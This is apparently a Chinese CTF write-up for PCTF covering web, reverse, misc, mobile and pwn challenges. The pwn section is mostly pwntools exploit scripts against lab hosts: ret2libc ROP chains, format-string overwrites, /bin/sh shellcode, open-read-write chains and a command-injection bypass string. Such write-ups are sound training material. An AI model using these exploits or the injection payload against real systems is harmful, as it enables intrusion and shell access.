PCTF-WP

inkey

Web

Sign In

开靶机,通过chrome的开发者工具找到了flag

Reverse

学ida与化学gdb

把程序拖入ida中即可找到flag

baby_python

再异或一次即可得到原文

1
2
3
4
5
6
7
8
import base64
a = 'v|qwk@idx_~O!cObuq!!)Oy~dubucdY~w!i111m'
b = []
for i in a:
    b.append(chr(ord(i) ^ 0x10))

b = "".join(b)
print(b)

xor

也是再异或一次出flag

1
2
3
enc = 'EOBDX@LMDQBWVOBWJLM|ZLVQ|BQF|QFBOOZ|HMLT|[LQ^'
for i in enc:
    print(chr(ord(i)^0x23),end="")

Misc

原神,启动!

去米游社找到提瓦特大陆通用文字即可解密

Mobile

find_the_cat

用android killer进行反编译后在main.activity附近即可找到flag

Pwn

login

签到题

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

k = 1
if k:
    p = remote('node6.anna.nssctf.cn','28247')
else:
    p = process('./orw')

p.send(b'I am a Pwn master')

p.interactive()

别骂了别骂了

本题的关键是找到sh字符串,即’$0\x00’

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

k = 1
if k:
    p = remote('node6.anna.nssctf.cn','28255')
else:
    p = process('./3')
elf = ELF('./3')
# gdb.attach(p, 'b *0x401267')

sh_addr = 0x4020d8
ret_addr = 0x40101a
rdi_addr = 0x4012d3
system_addr = elf.plt['system']

payload = b'a' * 0x28 + p64(rdi_addr) + p64(sh_addr) + p64(ret_addr) + p64(system_addr)
p.recvuntil(b'good luck\n')
p.send(payload)

p.interactive()

easy_shellcode

简单的shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

k = 1
if k:
    p = remote('node6.anna.nssctf.cn','28970')
else:
    p = process('./shellcode')
# elf = ELF('./shellcode')

shellcode = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'

p.send(shellcode)

p.interactive()

Simple_fmt

利用格串漏洞将key改为666

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

k = 1
if k:
    p = remote('node6.anna.nssctf.cn','28257')
else:
    p = process('./fmt')
elf = ELF('./fmt')
# gdb.attach(p,'b *0x401270')

key_addr = 0x40408C
offset = 6
# payload = b'aaaaaaaa' + b'%666c%7$n' + p64(key_addr)
payload = fmtstr_payload(offset,{key_addr:666})
p.sendlineafter(b'Output something\n',payload)

p.interactive()

korey’s shell

简单的命令行绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

k = 1
if k:
    p = remote('node6.anna.nssctf.cn','28979')
else:
    p = process('./2')
elf = ELF('./2')

p.recvuntil(b'korey$:')
p.sendline(b'PING')
p.recvuntil(b'ip:')
sleep(0.1)
p.sendline(b'1;/b\'i\'n/s\'h\'')

p.interactive()

fmt

格串泄露libc和canary,栈溢出ret2libc拿shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

k = 1
if k:
    p = remote('node6.anna.nssctf.cn', '28814')
else:
    p = process('./fmt2')
elf = ELF('./fmt2')
libc = ELF('./libc-2.31.so')
# gdb.attach(p, 'b *0x40130A')

p.sendlineafter(b'Can you bypass these protections?\n', b'%9$p%19$p')
recv = p.recv(36)
canary = int(recv[:18], 16)
print(hex(canary))
start_addr = recv[18:32]
start_addr = int(start_addr, 16)
print(hex(start_addr))
libc_base = start_addr - 0x24083

rdi_addr = 0x401373
ret_addr = 0x401374
# doit_addr = 0x4012C9
# puts_got = elf.got['puts']
# puts_plt = elf.plt['puts']
# payload1 = b'a' * 0x28 + p64(canary) + p64(0) + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(doit_addr)
# p.sendlineafter(b'just do it\n', payload1)
# puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# libc_base = puts_addr - libc.sym['puts']
print(hex(libc_base))

one_gadget = libc_base + 0xe3afe
sys_addr = libc_base + libc.sym['system']
sh_addr = libc_base + 0x001b45bd
payload2 = b'a' * 0x28 + p64(canary) + p64(0) + p64(ret_addr) + p64(rdi_addr) + p64(sh_addr) + p64(sys_addr)
p.sendlineafter(b'just do it\n', payload2)

p.interactive()

libc-orw

先利用puts泄露libc,在用ROP链构造orw

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

k = 1
if k:
    p = remote('node6.anna.nssctf.cn', '28282')
else:
    p = process('./orw')
    gdb.attach(p, 'b *0x401425')
elf = ELF('./orw')
libc = ELF('./libc-2.31.so')

rdi_addr = 0x401493
rsi_r15_addr = 0x401491
flag_addr = 0x402008
bss_addr = 0x404080
read_addr = 0x4013FD
leave_ret = 0x401424
orw_addr = 0x401306
main_addr = 0x4013A5
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
read_plt = elf.plt['read']
write_plt = elf.plt['write']
open_plt = elf.plt['open']

payload1 = b'a' * 0x28 + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

p.sendlineafter(b'try to open read and write!\n', payload1)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# print(hex(puts_addr))
libc_base = puts_addr - libc.sym['puts']
print(hex(libc_base))

jmp_rdx = libc_base + 0x40781
jmp_rbx = libc_base + 0x3aacd
rsi_addr = libc_base + 0x2601f
rdx_addr = libc_base + 0x142c92
rbx_addr = libc_base + 0x2fdaf
payload2 = b'a' * 0x28 + p64(rdi_addr) + p64(flag_addr) + p64(rsi_addr) + p64(0) + p64(open_plt)
payload2 += p64(rdi_addr) + p64(3) + p64(rsi_addr) + p64(bss_addr) + p64(rdx_addr) + p64(0x100) + p64(read_plt)
payload2 += p64(rdi_addr) + p64(1) + p64(write_plt)
# payload2 = b'a' * 0x28 + p64(rdi_addr) + p64(0) + p64(rsi_addr) + p64(bss_addr + 0x20) + p64(rdx_addr) + p64(0x100) + p64(read_plt)
# payload2 += p64(rbx_addr) + p64(bss_addr + 0x20) + p64(jmp_rbx)
p.sendlineafter(b'try to open read and write!\n', payload2)

# shellcode = asm(shellcraft.open('./flag'))
# shellcode += asm(shellcraft.read(3, bss_addr, 0x20))
# shellcode += asm(shellcraft.write(1, bss_addr, 0x20))
# sleep(0.1)
# p.send(shellcode)

sleep(0.1)
p.interactive()

hard_shellcode

第一次shellcode限制输入7字节,我选择syscall read,并在rip后读入shellcode,利用orw拿flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

k = 1
if k:
    p = remote('node6.anna.nssctf.cn','28322')
else:
    p = process('./hardshellcode')
    # gdb.attach(p, 'b *0x600004')
    gdb.attach(p,'b *$rebase(0x1337)')
elf = ELF('./hardshellcode')

p.recvuntil(b'Maybe you need to write some compilations\n')

shellcode1 = b'\x52\x5E\x0F\x05\x52\xC3\x90'
p.send(shellcode1)
sleep(0.1)

shellcode2 = ''
shellcode2 += shellcraft.open('./flag')
shellcode2 += shellcraft.read('rax', 'rsp', 0x100)
shellcode2 += shellcraft.write(1, 'rsp', 0x100)
payload2 = b'\x90\x90\x90\x90' + asm(shellcode2)
p.send(payload2)

p.interactive()

usc

先利用write泄露libc,其中用到了csu的gadget,接着ret2libc拿shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

k = 1
if k:
    p = remote('node6.anna.nssctf.cn','28373')
else:
    p = process('./usc')
    # gdb.attach(p, 'b *0x401247')
elf = ELF('./usc')
libc = ELF('./libc.so.6')

rdi_addr = 0x4012b3
rsi_r15_addr = 0x4012b1
ret_addr = 0x4012B4
main_addr = 0x4011f8
write_plt = elf.plt['write']
write_got = elf.got['write']
payload1 = b'a' * 0x28 + p64(rdi_addr) + p64(1) + p64(rsi_r15_addr) + p64(write_got) + p64(0) + p64(write_plt) + p64(ret_addr) + p64(main_addr)
p.sendafter(b'now how you get the shell??\n', payload1)
write_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = write_addr - libc.sym['write']
print(hex(libc_base))

system_addr = libc_base + libc.sym['system']
sh_addr = libc_base + next(libc.search(b'/bin/sh'))
payload2 = b'a' * 0x28 + p64(rdi_addr) + p64(sh_addr) + p64(ret_addr) + p64(system_addr)
p.sendafter(b'now how you get the shell??\n', payload2)

p.interactive()

magic_login

多次利用格串,写返回地址,布置栈空间,用one_gadget拿shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

k = 1
if k:
    p = remote('node6.anna.nssctf.cn','28319')
else:
    p = process('./pwnm')
    # gdb.attach(p, 'b *0x40128d')
    # gdb.attach(p, 'b *0x401297')
elf = ELF('./pwnm')
libc = ELF('./mlibc.so.6')


def fmt(addr, offset):
    if addr == 0:
        payload = ('%{}$hhn'.format(offset).encode()).ljust(0x50, b'\x00')
    else:
        payload = ('%{}c%{}$hhn'.format(addr, offset).encode()).ljust(0x50, b'\x00')
    print("addr:{},offfset:{}".format(hex(addr), offset))
    p.sendafter(b'Welcome', payload)


p.sendafter(b'login\n', b'a' * 0x20)
p.sendafter(b'password\n', b'a' * 0x20)

payload1 = b'\x00' * 0xE + b'\x8a\x2c'
p.send(payload1)

puts_got = elf.got['puts']
payload2 = b'%8$p%11$p%41$p#'
p.sendafter(b'Welcome', payload2)
res = p.recvuntil(b'#')[:-1]
# print(res)
stack_addr = int(res[:14], 16)
libc_base = int(res[14:28], 16) - 0x24083
print("stack_addr:", hex(stack_addr))
print("libc_base:", hex(libc_base))

onegadget = libc_base + 0xe3afe
ret_addr = stack_addr - 0x8
strncmp_got = elf.got['strncmp']
stack1 = stack_addr + 0x18
stack2 = stack_addr + 0xf8
stack3 = int(res[30:], 16)
stack3 = stack3 - (stack3 & 0xff) + (stack_addr & 0xff)
stack3_low = stack3 & 0xff
print(hex(stack1), hex(stack2), hex(stack3))
offset_stack1, offset_stack2 = 13, 41
offset_stack3 = int((stack3 - stack_addr) / 8 + 10)
print("offset_stack3:", offset_stack3)
# 0x7fff616ca940 —▸ 0x7fff616ca9a8 —▸ 0x7fff616cc90d 26
# 0x7fff616ca8c8 —▸ 0x7fff616ca9a8 —▸ 0x7fff616cc90d
# offset_stack1 offset_stack2 1043
hack_addr = ret_addr
ret_low = ret_addr & 0xff
low1 = hack_addr & 0xff
low2 = hack_addr >> 8 & 0xff
low3 = hack_addr >> 16 & 0xff
low4 = hack_addr >> 24 & 0xff
low5 = hack_addr >> 32 & 0xff
low6 = hack_addr >> 40 & 0xff
print("hack_addr:", hex(hack_addr))

fmt(stack3_low, offset_stack1)
fmt(low1, offset_stack2)
fmt(stack3_low + 1, offset_stack1)
fmt(low2, offset_stack2)
fmt(stack3_low + 2, offset_stack1)
fmt(low3, offset_stack2)
fmt(stack3_low + 3, offset_stack1)
fmt(low4, offset_stack2)
fmt(stack3_low + 4, offset_stack1)
fmt(low5, offset_stack2)
fmt(stack3_low + 5, offset_stack1)
fmt(low6, offset_stack2)
fmt(stack3_low + 6, offset_stack1)
fmt(0, offset_stack2)
fmt(stack3_low + 7, offset_stack1)
fmt(0, offset_stack2)
fmt(stack3_low + 8, offset_stack1)
fmt(0, offset_stack2)
print("ret->pop_r12")
pop_r12 = libc_base + 0x2f709
hack_addr = pop_r12
low1 = hack_addr & 0xff
low2 = hack_addr >> 8 & 0xff
low3 = hack_addr >> 16 & 0xff
low4 = hack_addr >> 24 & 0xff
low5 = hack_addr >> 32 & 0xff
low6 = hack_addr >> 40 & 0xff
print("hack_addr:", hex(hack_addr))
fmt(stack3_low, offset_stack1)
fmt(ret_low, offset_stack2)
# p.sendafter(b'Welcome',('%{}$p'.format(offset_stack3)).encode().ljust(0x50,b'\x00'))
fmt(low1, offset_stack3)
fmt(ret_low + 1, offset_stack2)
fmt(low2, offset_stack3)
fmt(ret_low + 2, offset_stack2)
fmt(low3, offset_stack3)
fmt(ret_low + 3, offset_stack2)
fmt(low4, offset_stack3)
fmt(ret_low + 4, offset_stack2)
fmt(low5, offset_stack3)
fmt(ret_low + 5, offset_stack2)
fmt(low6, offset_stack3)

ret_addr = ret_addr + 0x10
hack_addr = ret_addr
ret_low = ret_addr & 0xff
low1 = hack_addr & 0xff
low2 = hack_addr >> 8 & 0xff
low3 = hack_addr >> 16 & 0xff
low4 = hack_addr >> 24 & 0xff
low5 = hack_addr >> 32 & 0xff
low6 = hack_addr >> 40 & 0xff
print("hack_addr:", hex(hack_addr))

fmt(stack3_low, offset_stack1)
fmt(low1, offset_stack2)
fmt(stack3_low + 1, offset_stack1)
fmt(low2, offset_stack2)
fmt(stack3_low + 2, offset_stack1)
fmt(low3, offset_stack2)
fmt(stack3_low + 3, offset_stack1)
fmt(low4, offset_stack2)
fmt(stack3_low + 4, offset_stack1)
fmt(low5, offset_stack2)
fmt(stack3_low + 5, offset_stack1)
fmt(low6, offset_stack2)
fmt(stack3_low + 6, offset_stack1)
fmt(0, offset_stack2)
fmt(stack3_low + 7, offset_stack1)
fmt(0, offset_stack2)
fmt(stack3_low + 8, offset_stack1)
fmt(0, offset_stack2)
print("ret->onegadget")
# pop_r12 = libc_base + 0x2f709
hack_addr = onegadget
low1 = hack_addr & 0xff
low2 = hack_addr >> 8 & 0xff
low3 = hack_addr >> 16 & 0xff
low4 = hack_addr >> 24 & 0xff
low5 = hack_addr >> 32 & 0xff
low6 = hack_addr >> 40 & 0xff
print("hack_addr:", hex(hack_addr))
fmt(stack3_low, offset_stack1)
fmt(ret_low, offset_stack2)
p.sendafter(b'Welcome',('%{}$p'.format(offset_stack3)).encode().ljust(0x50,b'\x00'))
fmt(low1, offset_stack3)
fmt(ret_low + 1, offset_stack2)
fmt(low2, offset_stack3)
fmt(ret_low + 2, offset_stack2)
fmt(low3, offset_stack3)
fmt(ret_low + 3, offset_stack2)
fmt(low4, offset_stack3)
fmt(ret_low + 4, offset_stack2)
fmt(low5, offset_stack3)
fmt(ret_low + 5, offset_stack2)
fmt(low6, offset_stack3)

p.sendafter(b'Welcome', b'exit')

p.interactive()